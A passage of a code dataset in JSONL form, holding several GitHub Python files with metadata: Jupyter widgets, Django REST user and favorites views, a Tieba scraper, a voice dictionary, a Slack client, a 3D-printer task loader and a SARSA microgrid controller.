change.new\n values = self.choices[state_choice]\n if not isinstance(values, list) and not isinstance(values, tuple):\n values = (values,)\n self._render(state_choice, values)\n\n\nclass InteractiveDiagram_2:\n \"\"\"A dropdown widget wrapper\"\"\"\n def __init__(self, choices: List, description: str):\n def get_default_choice():\n return list(self.choices.keys())[0]\n\n def get_default_renderer():\n val = list(self.choices.values())[0]\n return val\n\n self.choices = choices\n display(get_default_choice())\n\n self.choice_widget = widgets.Dropdown(\n options=self.choices.keys(),\n value=get_default_choice(),\n description=description,\n disabled=False,\n )\n dropdown_state_eventhandler = lambda change: self.dropdown_state_eventhandler(change)\n self.choice_widget.observe(dropdown_state_eventhandler, names='value')\n self._render(get_default_choice(), get_default_renderer())\n\n def _render(self, title, renderer):\n IPython.display.clear_output(wait=True)\n display(self.choice_widget)\n renderer(title=title)\n\n def dropdown_state_eventhandler(self, change):\n state_choice = change.new\n renderer = self.choices[state_choice]\n self._render(state_choice, renderer)\n", "repo_name": "NVIDIA/TensorRT", "sub_path": "tools/experimental/trt-engine-explorer/trex/interactive.py", "file_name": "interactive.py", "file_ext": "py", "file_size_in_byte": 2731, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8187, "dataset": "github-code", "pt": "53", "api": [{"api_name": "IPython.core.display.display", "line_number": 22, "usage_type": "call"}, {"api_name": "ipywidgets.widgets.Dropdown", "line_number": 24, "usage_type": "call"}, {"api_name": "ipywidgets.widgets", "line_number": 24, "usage_type": "name"}, {"api_name": "IPython.display.clear_output", "line_number": 35, "usage_type": "call"}, {"api_name": "IPython.display", "line_number": 35, "usage_type": "attribute"}, {"api_name": "IPython.core.display.display", "line_number": 36, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "IPython.core.display.display", "line_number": 58, "usage_type": "call"}, {"api_name": "ipywidgets.widgets.Dropdown", "line_number": 60, "usage_type": "call"}, {"api_name": "ipywidgets.widgets", "line_number": 60, "usage_type": "name"}, {"api_name": "IPython.display.clear_output", "line_number": 71, "usage_type": "call"}, {"api_name": "IPython.display", "line_number": 71, "usage_type": "attribute"}, {"api_name": "IPython.core.display.display", "line_number": 72, "usage_type": "call"}]}
+{"seq_id": "32922066620", "text": "from django.shortcuts import render\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\nfrom manga.models import Manga\n\nfrom users.models import Favorite\nfrom users.serializers import UserSerializer, UserSerializerWithToken, FavoriteSerializer\n\n# Create your views here.\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\nfrom rest_framework_simplejwt.views import TokenObtainPairView\n\nfrom django.contrib.auth.hashers import make_password\nfrom rest_framework import status\n\n\nclass MyTokenObtainPairSerializer(TokenObtainPairSerializer):\n def validate(self, attrs):\n data = super().validate(attrs)\n\n serializer = UserSerializerWithToken(self.user).data\n for k, v in serializer.items():\n data[k] = v\n\n return data\n\n\nclass MyTokenObtainPairView(TokenObtainPairView):\n serializer_class = MyTokenObtainPairSerializer\n\n\n# ----------------------------\n# Guest\n# ----------------------------\n\n\n@api_view(['POST'])\ndef registerUser(request):\n data = request.data\n try:\n user = User.objects.create(\n first_name=data['name'],\n username=data['email'],\n email=data['email'],\n password=make_password(data['password'])\n )\n\n serializer = UserSerializerWithToken(user, many=False)\n return Response(serializer.data)\n except:\n message = {'detail': 'User with this email already exists'}\n return Response(message, status=status.HTTP_400_BAD_REQUEST)\n\n\n# ----------------------------\n# User\n# ----------------------------\n\n\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated])\ndef updateUserProfile(request):\n try:\n user = request.user\n serializer = UserSerializerWithToken(user, many=False)\n\n data = request.data\n user.first_name = data['name']\n user.username = data['email']\n user.email = data['email']\n\n if data['password'] != '':\n user.password = make_password(data['password'])\n\n user.save()\n\n return Response(serializer.data)\n except Exception as e:\n return Response({'details': f\"{e}\"}, status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef getUserProfile(request):\n try:\n user = request.user\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)\n except Exception as e:\n return Response({'details': f\"{e}\"}, status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef handleFavorite(request, pk):\n try:\n user = request.user\n\n manga = Manga.objects.get(_id=pk)\n\n favorite = Favorite.objects.filter(Q(manga=manga) & Q(user=user))\n\n if (favorite):\n favorite.delete()\n manga.favorites -= 1\n manga.save()\n\n return Response('Favorite was deleted')\n else:\n createdFavorite = Favorite.objects.create(\n user=user,\n manga=manga\n )\n\n manga.favorites += 1\n manga.save()\n serializer = FavoriteSerializer(createdFavorite, many=False)\n return Response(serializer.data)\n except Exception as e:\n return Response({'details': f\"{e}\"}, status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef getMyFavorites(request):\n try:\n user = request.user\n favorites = user.favorite_set.all()\n serializer = FavoriteSerializer(favorites, many=True)\n return Response(serializer.data)\n except Exception as e:\n return Response({'details': f\"{e}\"}, status=status.HTTP_204_NO_CONTENT)\n", "repo_name": "Ren0503/mangaka-py-read-comic", "sub_path": "server/users/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework_simplejwt.serializers.TokenObtainPairSerializer", "line_number": 21, "usage_type": "name"}, {"api_name": "users.serializers.UserSerializerWithToken", "line_number": 25, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenObtainPairView", "line_number": 32, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 45, "usage_type": "name"}, {"api_name": "django.contrib.auth.hashers.make_password", "line_number": 49, "usage_type": "call"}, {"api_name": "users.serializers.UserSerializerWithToken", "line_number": 52, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 53, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 56, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 56, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 56, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 41, "usage_type": "call"}, {"api_name": "users.serializers.UserSerializerWithToken", "line_number": 69, "usage_type": "call"}, {"api_name": "django.contrib.auth.hashers.make_password", "line_number": 77, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 81, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 83, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 83, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 83, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 64, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 65, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 65, "usage_type": "name"}, {"api_name": "users.serializers.UserSerializer", "line_number": 91, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 92, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 94, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 94, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 94, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 86, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 87, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 87, "usage_type": "name"}, {"api_name": "manga.models", "line_number": 103, "usage_type": "name"}, {"api_name": "manga.models.Manga.objects.get", "line_number": 103, "usage_type": "call"}, {"api_name": "manga.models.Manga.objects", "line_number": 103, "usage_type": "attribute"}, {"api_name": "manga.models.Manga", "line_number": 103, "usage_type": "name"}, {"api_name": "users.models.Favorite.objects.filter", "line_number": 105, "usage_type": "call"}, {"api_name": "users.models.Favorite.objects", "line_number": 105, "usage_type": "attribute"}, {"api_name": "users.models.Favorite", "line_number": 105, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 105, "usage_type": "call"}, {"api_name": "manga.models", "line_number": 105, "usage_type": "name"}, {"api_name": "manga.models.favorites", "line_number": 109, "usage_type": "attribute"}, {"api_name": "manga.models", "line_number": 109, "usage_type": "name"}, {"api_name": "manga.models.save", "line_number": 110, "usage_type": "call"}, {"api_name": "manga.models", "line_number": 110, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 112, "usage_type": "call"}, {"api_name": "users.models.Favorite.objects.create", "line_number": 114, "usage_type": "call"}, {"api_name": "users.models.Favorite.objects", "line_number": 114, "usage_type": "attribute"}, {"api_name": "users.models.Favorite", "line_number": 114, "usage_type": "name"}, {"api_name": "manga.models", "line_number": 116, "usage_type": "name"}, {"api_name": "manga.models.favorites", "line_number": 119, "usage_type": "attribute"}, {"api_name": "manga.models", "line_number": 119, "usage_type": "name"}, {"api_name": "manga.models.save", "line_number": 120, "usage_type": "call"}, {"api_name": "manga.models", "line_number": 120, "usage_type": "name"}, {"api_name": "users.serializers.FavoriteSerializer", "line_number": 121, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 122, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 124, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 124, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 124, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 97, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 98, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 98, "usage_type": "name"}, {"api_name": "users.serializers.FavoriteSerializer", "line_number": 133, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 134, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 136, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 136, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 136, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 127, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 128, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 128, "usage_type": "name"}]}
+{"seq_id": "28596191580", "text": "from urllib.request import Request, urlopen\nfrom urllib.parse import urlencode\nfrom fake_useragent import UserAgent\n\nCONTENT = \"抗压背锅\"\nPN_PAGE = 3\n\ndef getting_page(url):\n headers = {\n 'user-agent': UserAgent().random\n }\n\n # 封装请求头\n request = Request(url, headers=headers)\n\n # 发送请求\n response = urlopen(request)\n\n return response.read() # 返回\n\n\n\n\n\n\ndef save_page(page_bytes, pn):\n with open(\"./\"+CONTENT+\"_\"+str(pn), 'wb') as f:\n f.write(page_bytes) # 以字节形式写入。\n\n\ndef main() -> None:\n # 准备url:\n raw_url = \"https://tieba.baidu.com/f?{}\"\n for pn in range(PN_PAGE):\n args = {\n 'kw': CONTENT,\n 'ie': 'utf-8',\n 'pn': pn * 50 # 观察URL页面规律\n }\n\n url = raw_url.format(urlencode(args))\n page_bytes = getting_page(url)\n # 保存\n save_page(page_bytes, pn) #\n\n\n\n\nif __name__ == '__main__':\n main()", "repo_name": "WakingHours-GitHub/PythonSpider", "sub_path": "1_urllib的使用/5_贴吧案例.py", "file_name": "5_贴吧案例.py", "file_ext": "py", "file_size_in_byte": 968, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fake_useragent.UserAgent", "line_number": 10, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "1362365274", "text": "# this is about creating a dictionary in python using the given data.\n\nimport json\nfrom difflib import get_close_matches\nimport speech_recognition as sr\n\ndata = json.load(open(\"data.json\"))\n\n# take word as voice input from user.\ndef word_voice_find():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening...\")\n audio = r.listen(source)\n try:\n word = r.recognize_google(audio)\n word = word.lower()\n uword = word.title()\n if word in data:\n for i in data[word]:\n print(word+\" means \"+i)\n elif uword in data:\n for i in data[uword]:\n print(uword+\" means \"+i)\n else:\n poss = get_close_matches(word,data.keys(),1,0.8)\n if len(poss) == 0:\n print(\"Well is that even a word!\")\n else:\n for i in data[poss[0]]:\n print(poss[0]+\" means \"+i)\n except sr.UnknownValueError:\n print(\"We couldn't get what you are trying to say!\")\n except sr.RequestError as e:\n print(\"Sphinx error; {0}\".format(e))\n# take word as input from user\ndef word_keyboard_find():\n print(\"\\n\")\n word = input(\"Enter a word: \")\n word = word.lower()\n uword = word.title()\n if word in data:\n for i in data[word]:\n print(i)\n elif uword in data:\n for i in data[uword]:\n print(i)\n else:\n poss = get_close_matches(word,data.keys())\n if len(poss) > 0:\n print(\"It seems you have misspelled\")\n for i in poss:\n print(i)\n ch = input(\"Enter Y/N: \")\n if ch == 'y':\n word_find()\n else:\n print(\"Well is \"+word+\" even a word?\")\n\n# take user's choice either voice or traditional input.\n\nchoice = input(\"Great! So how are you planning to use this app?\"+\n\"\\n press 1 for keyboard input\"+\n\"\\n press 2 for voice input\")\n\nif choice == '1':\n word_keyboard_find()\nelif choice == '2':\n word_voice_find()\nelse:\n print(\"I guess you have made a wrong choice! You need to start over again\")\n", "repo_name": "shivank-awasthi/PythonDictionary", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2129, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 7, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 11, "usage_type": "call"}, {"api_name": "speech_recognition.Microphone", "line_number": 12, "usage_type": "call"}, {"api_name": "difflib.get_close_matches", "line_number": 26, "usage_type": "call"}, {"api_name": "speech_recognition.UnknownValueError", "line_number": 32, "usage_type": "attribute"}, {"api_name": "speech_recognition.RequestError", "line_number": 34, "usage_type": "attribute"}, {"api_name": "difflib.get_close_matches", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "17789931612", "text": "# coding: UTF-8\nfrom apps.logger import AppLogger\nfrom slackweb import Slack\nfrom urllib.error import HTTPError, URLError\n\n\nclass SlackClient:\n\n slack: Slack\n\n def __init__(self, url: str):\n self.slack = Slack(url=url)\n\n def post(self, message):\n\n logger = AppLogger.get_logger(__name__)\n\n try:\n self.slack.notify(text=message)\n\n except HTTPError as error:\n logger.error('Error code: %s' % error.code)\n\n except URLError as error:\n logger.error('Reason: %s' % error.reason)\n", "repo_name": "blendthink/weather_forecast", "sub_path": "infras/clients/slack_client.py", "file_name": "slack_client.py", "file_ext": "py", "file_size_in_byte": 550, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "slackweb.Slack", "line_number": 9, "usage_type": "name"}, {"api_name": "slackweb.Slack", "line_number": 12, "usage_type": "call"}, {"api_name": "apps.logger.AppLogger.get_logger", "line_number": 16, "usage_type": "call"}, {"api_name": "apps.logger.AppLogger", "line_number": 16, "usage_type": "name"}, {"api_name": "urllib.error.HTTPError", "line_number": 21, "usage_type": "name"}, {"api_name": "urllib.error.URLError", "line_number": 24, "usage_type": "name"}]}
+{"seq_id": "1239981035", "text": "import matplotlib.ticker as ticker\nimport matplotlib.pyplot as plt\nfrom evaluation import evaluate\n\ndef showAttention(input_sentence, output_words, attentions):\n # Set up figure with colorbar\n fig = plt.figure()\n ax = fig.add_subplot(111)\n cax = ax.matshow(attentions.numpy(), cmap='bone')\n fig.colorbar(cax)\n\n # Set up axes\n ax.set_xticklabels([''] + input_sentence.split(' ') +\n [''], rotation=90)\n ax.set_yticklabels([''] + output_words)\n\n # Show label at every tick\n ax.xaxis.set_major_locator(ticker.MultipleLocator(1))\n ax.yaxis.set_major_locator(ticker.MultipleLocator(1))\n\n plt.show()\n\n\ndef evaluateAndShowAttention(input_lang, output_lang, encoder1, attn_decoder1, input_sentence,):\n output_words, attentions = evaluate(input_lang, output_lang, encoder1, attn_decoder1, input_sentence)\n print('input =', input_sentence)\n print('output =', ' '.join(output_words))\n showAttention(input_sentence, output_words, attentions)", "repo_name": "Remomare/seq2seq_Translation_WMT16", "sub_path": "attn_visualizing.py", "file_name": "attn_visualizing.py", "file_ext": "py", "file_size_in_byte": 1003, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "evaluation.evaluate", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "26503229007", "text": "\nfrom multiprocessing import Process\nfrom zipfile import crc32\nfrom shutil import copyfile\nfrom select import select\nfrom time import time\nimport logging\nimport struct\nimport socket\nimport os\n\nfrom setproctitle import setproctitle\n\nfrom fluxmonitor.err_codes import FILE_BROKEN, NOT_SUPPORT\nfrom fluxmonitor.storage import UserSpace\n\n# G0_G1_CMD_PARSER = re.compile(\"G[0-1]( F(?P[0-9]+))?( X(?P[\\-0-9.]+))?\"\n# \"( Y(?P[\\-0-9.]+))?( Z(?P[\\-0-9.]+))?\"\n# \"( E(?P[\\-0-9.]+))?( F(?P[0-9]+))?\")\n# G28_PARSER = re.compile(\"(^G28|\\ G28)(\\ |$)\")\n# T_PARSER = re.compile(\"(^T\\d|\\ T\\d)(\\ |$)\")\n\nlogger = logging.getLogger(\"TaskLoader\")\nINT_PACKER = struct.Struct(\"= 5:\n space.rm(\"SD\", name)\n else:\n place_file(syntax, index + 1)\n space.mv(\"SD\", name, syntax % (index + 1))\n\n place_file(\"Recent/recent-%i.fc\", 1)\n if use_swap:\n space.mv(\"SD\", \"Recent/swap.fc\", \"Recent/recent-1.fc\")\n elif space.in_entry(\"SD\", filename):\n os.link(filename,\n space.get_path(\"SD\", \"Recent/recent-1.fc\"))\n else:\n copyfile(filename,\n space.get_path(\"SD\", \"Recent/recent-1.fc\"))\n os.system(\"sync\")\n\n\nclass TaskLoader(Process):\n \"\"\"\n Useable property:\n loader.fileno() - Endpoint to read stream data\n loader.close() - Close io and subprocess\n loader.script_size - Entire script size (bytes)\n loader.io_progress - Script alread readed (bytes)\n loader.metadata - Dict store metadata in file\n \"\"\"\n\n def _load(self, task_file, crc_check):\n t = task_file\n\n # Check header\n magic_num = t.read(8)\n if magic_num != b\"FCx0001\\n\":\n if magic_num[:3] != b\"FCx\" or magic_num[3:].isdigit() is False:\n raise RuntimeError(FILE_BROKEN)\n else:\n ver = int(magic_num[3:])\n raise RuntimeError(FILE_BROKEN, NOT_SUPPORT, str(ver))\n\n # Check script\n script_size = UINT_PACKER.unpack(t.read(4))[0]\n self.script_ptr = t.tell()\n self.script_size = script_size\n\n if crc_check:\n script_crc32 = 0\n f_ptr = 0\n while f_ptr < script_size:\n buf = t.read(min(script_size - f_ptr, 4096))\n if buf:\n f_ptr += len(buf)\n script_crc32 = crc32(buf, script_crc32)\n else:\n raise RuntimeError(FILE_BROKEN, \"LENGTH_ERROR\")\n\n req_script_crc32 = INT_PACKER.unpack(t.read(4))[0]\n if req_script_crc32 != script_crc32:\n raise RuntimeError(FILE_BROKEN, \"SCRIPT_CRC32\")\n else:\n t.seek(script_size + 4, 1)\n\n # Check meta\n meta_size = UINT_PACKER.unpack(t.read(4))[0]\n meta_buf = t.read(meta_size)\n req_metadata_crc32 = INT_PACKER.unpack(t.read(4))[0]\n if crc_check and req_metadata_crc32 != crc32(meta_buf, 0):\n raise RuntimeError(FILE_BROKEN, \"METADATA_CRC32\")\n\n metadata = {}\n for item in meta_buf.split(\"\\x00\"):\n sitem = item.split(\"=\", 1)\n if len(sitem) == 2:\n metadata[sitem[0]] = sitem[1]\n self.metadata = metadata\n\n t.seek(self.script_ptr)\n\n def __init__(self, task_file, crc_check=True):\n self._load(task_file, crc_check)\n self.task_file = task_file\n\n self.io_in, self.io_out = socket.socketpair()\n\n super(TaskLoader, self).__init__(target=self.__serve_forever)\n self.daemon = True\n self.start()\n\n self.fout = self.io_out.makefile(\"rb\", -1)\n\n # Remember to close after forked !!\n self.io_in.close()\n del self.io_in\n\n @property\n def io_progress(self):\n return self.task_file.tell() - 12\n\n def __serve_forever(self):\n setproctitle(\"fluxplayer: TaskLoader\")\n logger.debug(\"TaskLoader forked\")\n\n self.io_out.close()\n del self.io_out\n\n try:\n readed = 0\n buf = bytearray(4096)\n view = memoryview(buf)\n\n while readed < self.script_size:\n l = self.task_file.readinto(buf)\n if l == 0:\n # EOF\n return\n elif readed + l < self.script_size:\n readed += l\n else:\n l = self.script_size - readed\n readed = self.script_size\n\n offset = 0\n while offset < l:\n rl, wl, _ = select((self.io_in, ), (self.io_in, ), (), 3.0)\n if rl:\n # Remote should not send anything, close socket\n # directory\n return\n if wl:\n offset += self.io_in.send(view[offset:l])\n\n logger.debug(\"TaskLoader close normally\")\n except KeyboardInterrupt:\n pass\n except Exception:\n logger.exception(\"TaskLoader close with error\")\n\n finally:\n self.io_in.shutdown(socket.SHUT_WR)\n t = time()\n while not select((self.io_in, ), (), (), 3)[0]:\n # Wait for remote close socket\n if time() - t > 28800:\n # if wait for more then 8hr, interrupt it.\n break\n self.io_in.close()\n\n def fileno(self):\n return self.fout.fileno()\n\n def close(self):\n self.io_out.close()\n self.fout.close()\n self.task_file.close()\n\n if self.is_alive():\n self.terminate()\n", "repo_name": "flux3dp/delta-firmware", "sub_path": "fluxmonitor/player/misc.py", "file_name": "misc.py", "file_ext": "py", "file_size_in_byte": 6368, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "struct.Struct", "line_number": 24, "usage_type": "call"}, {"api_name": "struct.Struct", "line_number": 25, "usage_type": "call"}, {"api_name": "fluxmonitor.storage.UserSpace", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.link", "line_number": 54, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 57, "usage_type": "call"}, {"api_name": "os.system", "line_number": 59, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 62, "usage_type": "name"}, {"api_name": "fluxmonitor.err_codes.FILE_BROKEN", "line_number": 79, "usage_type": "argument"}, {"api_name": "fluxmonitor.err_codes.FILE_BROKEN", "line_number": 82, "usage_type": "argument"}, {"api_name": "fluxmonitor.err_codes.NOT_SUPPORT", "line_number": 82, "usage_type": "argument"}, {"api_name": "zipfile.crc32", "line_number": 96, "usage_type": "call"}, {"api_name": "fluxmonitor.err_codes.FILE_BROKEN", "line_number": 98, "usage_type": "argument"}, {"api_name": "fluxmonitor.err_codes.FILE_BROKEN", "line_number": 102, "usage_type": "argument"}, {"api_name": "zipfile.crc32", "line_number": 110, "usage_type": "call"}, {"api_name": "fluxmonitor.err_codes.FILE_BROKEN", "line_number": 111, "usage_type": "argument"}, {"api_name": "socket.socketpair", "line_number": 126, "usage_type": "call"}, {"api_name": "setproctitle.setproctitle", "line_number": 143, "usage_type": "call"}, {"api_name": "select.select", "line_number": 167, "usage_type": "call"}, {"api_name": "socket.SHUT_WR", "line_number": 182, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 183, "usage_type": "call"}, {"api_name": "select.select", "line_number": 184, "usage_type": "call"}, {"api_name": "time.time", "line_number": 186, "usage_type": "call"}]}
+{"seq_id": "31175113368", "text": "from rest_framework import serializers\nfrom apitest.models import Cube, Addcube\n\nclass CubeSerializer(serializers.ModelSerializer):\n class Meta:\n model = Cube\n fields = ['id', 'character_name', 'create_date', 'cube_type', 'item_upgrade_result','item_level',\n 'target_item','potential_option_grade','before_options_value1','before_options_grade1',\n 'before_options_value2','before_options_grade2','before_options_value3','before_options_grade3',\n 'after_options_value1','after_options_grade1','after_options_value2','after_options_grade2',\n 'after_options_value3','after_options_grade3']", "repo_name": "JunHeeMerong/JunBlog", "sub_path": "apitest/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 671, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 4, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 4, "usage_type": "name"}, {"api_name": "apitest.models.Cube", "line_number": 6, "usage_type": "name"}]}
+{"seq_id": "42295928488", "text": "from rest_framework import serializers\nfrom .models import DocFile\nimport ipdb\n\n\nclass ParseSerializer(serializers.ModelSerializer):\n file = serializers.FileField()\n\n class Meta:\n model = DocFile\n fields = [\"file\"]\n\n def create(self, validated_data):\n\n # for key, value in validated_data.items():\n # ipdb.set_trace()\n\n return DocFile.objects.create(**validated_data)\n", "repo_name": "Marchi8/desafio_backend", "sub_path": "parser/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 415, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 6, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 6, "usage_type": "name"}, {"api_name": "rest_framework.serializers.FileField", "line_number": 7, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 7, "usage_type": "name"}, {"api_name": "models.DocFile", "line_number": 10, "usage_type": "name"}, {"api_name": "models.DocFile.objects.create", "line_number": 18, "usage_type": "call"}, {"api_name": "models.DocFile.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.DocFile", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "12540466655", "text": "\"\"\"\nSARSA Controller\n\nTrain a value function using the SARSA controller with the tile coding approximation\n\nInputs : name of previous value function, \n name of new value function, \n number of episodes, \n steps per episode,\n action frequency in seconds,\n exploration rate,\n alpha,\n beta\n\nOutputs : Creates new value function weights pickle file in Value Function directory,\n Plots Network durnig training\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport pickle\nimport random\n\nimport itertools\nfrom Microgrids_Network_env_fix import *\nfrom vf_tile_coding_approx import ValueFunction\n\n\nclass SarsaController:\n def __init__(self, exp_rate=0.12, beta=0.01): #reward very high, lower value with beta\n \n b = [[0,1], [0,1], [0,1], [0,1], [0,1]]\n self.actions = list(itertools.product(*b))\n self.state = [[0,0,0], [0,0,0], [0,0,0],[0,0,0], [0,0,0], 0,0, 0,0,0,0,0 ] # see above\n\n self.exp_rate = exp_rate\n self.beta = beta\n \n #stabilizer test\n self.old_action = random.choice(self.actions)\n\n def chooseAction(self, new_state, valueFunc):\n \n v_best = float('-inf')\n action = []\n\n if np.random.uniform(0, 1) <= self.exp_rate:\n action = random.choice(self.actions)\n \n else:\n for a in self.actions:\n v = valueFunc.value(new_state, a)\n if v > v_best:\n v_best = v\n action = a\n\n return action\n\n def run(self, network, valueFunc, steps=1000, inner_steps=100, idle_iter=50, debug=False ):\n \n avg_reward = 0\n total_reward = 0\n\n #Random initialization\n network.reset()\n cur_action = random.choice(self.actions)\n cur_state = network.state\n\n for i in range(1, steps + 1):\n \n mean_reward = 0\n #take average reward during idle_iter \n for k in range(0, idle_iter): #step the network several times so it inputs a control at most every 1 ms (otehrwise too fast, exp growth)\n new_state, reward, _,_ = network.step(cur_action)\n mean_reward += reward\n\n mean_reward /= idle_iter\n\n new_action = self.chooseAction(new_state, valueFunc)\n\n total_reward += reward\n if debug:\n print(\"state {} action {} reward {}\".format(cur_state, cur_action, reward))\n if i % inner_steps == 0:\n print(\"step {} -> avg reward {} total reward {}\".format(i, avg_reward, total_reward))\n\n delta = reward - avg_reward + valueFunc.value(new_state, new_action) - valueFunc.value(cur_state,\n cur_action)\n avg_reward += self.beta * delta\n valueFunc.update(cur_state, cur_action, delta)\n\n cur_state = new_state\n cur_action = new_action\n\n #Stopping criterion if V too high\n highest_V = 0.0\n\n for j in range(0,4):\n if(cur_state[j] > highest_V):\n highest_V = cur_state[j]\n \n if(highest_V >= 120.0):\n 